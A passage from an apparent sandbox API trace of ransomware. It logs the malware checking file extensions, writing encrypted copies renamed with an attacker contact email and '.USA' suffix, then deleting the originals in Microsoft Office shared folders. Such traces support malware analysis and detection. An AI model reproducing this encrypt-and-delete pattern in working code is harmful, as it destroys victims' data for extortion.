(lpString1=".xls", lpString2=".GIF") returned 1 [0048.891] lstrlenW (lpString=".xlsx") returned 5 [0048.891] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.891] lstrlenW (lpString=".ppt") returned 4 [0048.891] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.891] lstrlenW (lpString=".zip") returned 4 [0048.891] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.891] lstrlenW (lpString=".rar") returned 4 [0048.891] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.891] lstrlenW (lpString=".bz2") returned 4 [0048.891] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.891] lstrlenW (lpString=".7z") returned 3 [0048.891] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.891] lstrlenW (lpString=".dbf") returned 4 [0048.892] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.892] lstrlenW (lpString=".1cd") returned 4 [0048.892] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.892] lstrlenW (lpString=".jpg") returned 4 [0048.892] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.892] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0048.892] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.892] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0049.167] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=18380) returned 1 [0049.167] CloseHandle (hObject=0x1b0) returned 1 [0049.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 0x20 [0049.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0049.168] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0049.168] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.168] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.168] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0049.177] GetLastError () returned 0x0 [0049.177] ReadFile (in: hFile=0x1b0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x47cc, lpOverlapped=0x0) returned 1 [0049.200] WriteFile (in: hFile=0x208, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x47d0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x47d0, lpOverlapped=0x0) returned 1 [0049.201] ReadFile (in: hFile=0x1b0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.202] WriteFile (in: hFile=0x208, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.202] SetEndOfFile (hFile=0x208) returned 1 [0049.202] CloseHandle (hObject=0x208) returned 1 [0049.202] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.202] SetEndOfFile (hFile=0x1b0) returned 1 [0049.203] CloseHandle (hObject=0x1b0) returned 1 [0049.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.203] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 1 [0049.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.203] lstrlenW (lpString=".doc") returned 4 [0049.203] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.203] lstrlenW (lpString=".docx") returned 5 [0049.203] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.203] lstrlenW (lpString=".pdf") returned 4 [0049.203] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.203] lstrlenW (lpString=".xls") returned 4 [0049.203] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.203] lstrlenW (lpString=".xlsx") returned 5 [0049.203] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.204] lstrlenW (lpString=".ppt") returned 4 [0049.204] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.204] lstrlenW (lpString=".zip") returned 4 [0049.204] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.204] lstrlenW (lpString=".rar") returned 4 [0049.204] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.204] lstrlenW (lpString=".bz2") returned 4 [0049.204] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.204] lstrlenW (lpString=".7z") returned 3 [0049.204] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.204] lstrlenW (lpString=".dbf") returned 4 [0049.204] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.204] lstrlenW (lpString=".1cd") returned 4 [0049.204] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.204] lstrlenW (lpString=".jpg") returned 4 [0049.204] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.204] lstrlenW (lpString=".doc") returned 4 [0049.204] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.204] lstrlenW (lpString=".docx") returned 5 [0049.204] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.204] lstrlenW (lpString=".pdf") returned 4 [0049.204] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.204] lstrlenW (lpString=".xls") returned 4 [0049.204] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.204] lstrlenW (lpString=".xlsx") returned 5 [0049.204] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.204] lstrlenW (lpString=".ppt") returned 4 [0049.204] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.205] lstrlenW (lpString=".zip") returned 4 [0049.205] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.205] lstrlenW (lpString=".rar") returned 4 [0049.205] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.205] lstrlenW (lpString=".bz2") returned 4 [0049.205] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.205] lstrlenW (lpString=".7z") returned 3 [0049.205] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.205] lstrlenW (lpString=".dbf") returned 4 [0049.205] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.205] lstrlenW (lpString=".1cd") returned 4 [0049.205] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.205] lstrlenW (lpString=".jpg") returned 4 [0049.205] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.205] lstrcmpiW (lpString1=".CHM", lpString2=".USA") returned -1 [0049.205] lstrlenW (lpString="VBCN6.CHM") returned 9 [0049.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0049.205] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=109718) returned 1 [0049.206] CloseHandle (hObject=0x1b0) returned 1 [0049.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm")) returned 0x20 [0049.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0049.206] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0049.206] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.206] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.206] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0049.206] GetLastError () returned 0x0 [0049.206] ReadFile (in: hFile=0x1b0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x1ac96, lpOverlapped=0x0) returned 1 [0049.210] WriteFile (in: hFile=0x208, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1aca0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1aca0, lpOverlapped=0x0) returned 1 [0049.212] ReadFile (in: hFile=0x1b0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.212] WriteFile (in: hFile=0x208, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.212] SetEndOfFile (hFile=0x208) returned 1 [0049.212] CloseHandle (hObject=0x208) returned 1 [0049.213] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.213] SetEndOfFile (hFile=0x1b0) returned 1 [0049.214] CloseHandle (hObject=0x1b0) returned 1 [0049.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.215] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm")) returned 1 [0049.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.215] lstrlenW (lpString=".doc") returned 4 [0049.215] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.215] lstrlenW (lpString=".docx") returned 5 [0049.215] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.215] lstrlenW (lpString=".pdf") returned 4 [0049.215] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.215] lstrlenW (lpString=".xls") returned 4 [0049.215] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.215] lstrlenW (lpString=".xlsx") returned 5 [0049.215] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.215] lstrlenW (lpString=".ppt") returned 4 [0049.215] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.215] lstrlenW (lpString=".zip") returned 4 [0049.215] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.215] lstrlenW (lpString=".rar") returned 4 [0049.215] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.215] lstrlenW (lpString=".bz2") returned 4 [0049.215] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.215] lstrlenW (lpString=".7z") returned 3 [0049.215] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.215] lstrlenW (lpString=".dbf") returned 4 [0049.216] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.216] lstrlenW (lpString=".1cd") returned 4 [0049.216] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.216] lstrlenW (lpString=".jpg") returned 4 [0049.216] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.216] lstrlenW (lpString=".doc") returned 4 [0049.216] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.216] lstrlenW (lpString=".docx") returned 5 [0049.216] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.216] lstrlenW (lpString=".pdf") returned 4 [0049.216] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.216] lstrlenW (lpString=".xls") returned 4 [0049.216] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.216] lstrlenW (lpString=".xlsx") returned 5 [0049.216] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.216] lstrlenW (lpString=".ppt") returned 4 [0049.216] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.216] lstrlenW (lpString=".zip") returned 4 [0049.216] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.216] lstrlenW (lpString=".rar") returned 4 [0049.216] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.216] lstrlenW (lpString=".bz2") returned 4 [0049.216] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.216] lstrlenW (lpString=".7z") returned 3 [0049.216] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.216] lstrlenW (lpString=".dbf") returned 4 [0049.217] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.217] lstrlenW (lpString=".1cd") returned 4 [0049.217] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.217] lstrlenW (lpString=".jpg") returned 4 [0049.217] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.217] lstrcmpiW (lpString1=".CHM", lpString2=".USA") returned -1 [0049.217] lstrlenW (lpString="VBENDF98.CHM") returned 12 [0049.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0049.219] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=72031) returned 1 [0049.219] CloseHandle (hObject=0x208) returned 1 [0049.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm")) returned 0x20 [0049.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0049.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0049.219] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.219] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0049.220] GetLastError () returned 0x0 [0049.220] ReadFile (in: hFile=0x208, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x1195f, lpOverlapped=0x0) returned 1 [0049.223] WriteFile (in: hFile=0x1f4, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x11960, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x11960, lpOverlapped=0x0) returned 1 [0049.225] ReadFile (in: hFile=0x208, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.225] WriteFile (in: hFile=0x1f4, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.225] SetEndOfFile (hFile=0x1f4) returned 1 [0049.225] CloseHandle (hObject=0x1f4) returned 1 [0049.225] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.225] SetEndOfFile (hFile=0x208) returned 1 [0049.226] CloseHandle (hObject=0x208) returned 1 [0049.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.227] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm")) returned 1 [0049.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.227] lstrlenW (lpString=".doc") returned 4 [0049.227] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.227] lstrlenW (lpString=".docx") returned 5 [0049.227] lstrcmpiW (lpString1=".docx", lpString2="8.CHM") returned -1 [0049.227] lstrlenW (lpString=".pdf") returned 4 [0049.227] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.227] lstrlenW (lpString=".xls") returned 4 [0049.227] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.227] lstrlenW (lpString=".xlsx") returned 5 [0049.227] lstrcmpiW (lpString1=".xlsx", lpString2="8.CHM") returned -1 [0049.227] lstrlenW (lpString=".ppt") returned 4 [0049.227] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.227] lstrlenW (lpString=".zip") returned 4 [0049.227] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.227] lstrlenW (lpString=".rar") returned 4 [0049.228] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.228] lstrlenW (lpString=".bz2") returned 4 [0049.228] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.228] lstrlenW (lpString=".7z") returned 3 [0049.228] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.228] lstrlenW (lpString=".dbf") returned 4 [0049.228] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.228] lstrlenW (lpString=".1cd") returned 4 [0049.228] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.228] lstrlenW (lpString=".jpg") returned 4 [0049.228] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.228] lstrlenW (lpString=".doc") returned 4 [0049.228] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.228] lstrlenW (lpString=".docx") returned 5 [0049.228] lstrcmpiW (lpString1=".docx", lpString2="8.CHM") 